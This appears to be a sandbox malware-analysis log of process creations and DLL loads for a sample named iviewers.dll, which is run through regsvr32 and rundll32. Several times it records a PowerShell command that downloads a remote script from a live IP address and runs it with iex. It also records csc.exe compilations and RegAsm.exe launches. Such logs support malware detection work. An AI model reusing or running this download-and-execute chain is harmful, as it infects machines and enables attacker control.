            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
            Source: iviewers.dll | Virustotal: Detection: 38%
            Source: iviewers.dll | ReversingLabs: Detection: 36%
            Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\iviewers.dll"
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES61E6.tmp" "c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES63AB.tmp" "c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP"
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C65.tmp" "c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7C53.tmp" "c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP"
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7CE0.tmp" "c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES83D5.tmp" "c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9337.tmp" "c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES61E6.tmp" "c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES63AB.tmp" "c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C65.tmp" "c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7C53.tmp" "c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7CE0.tmp" "c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES83D5.tmp" "c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9337.tmp" "c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP"
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: version.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: textshaping.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: textinputframework.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: coreuicomponents.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\loaddll32.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
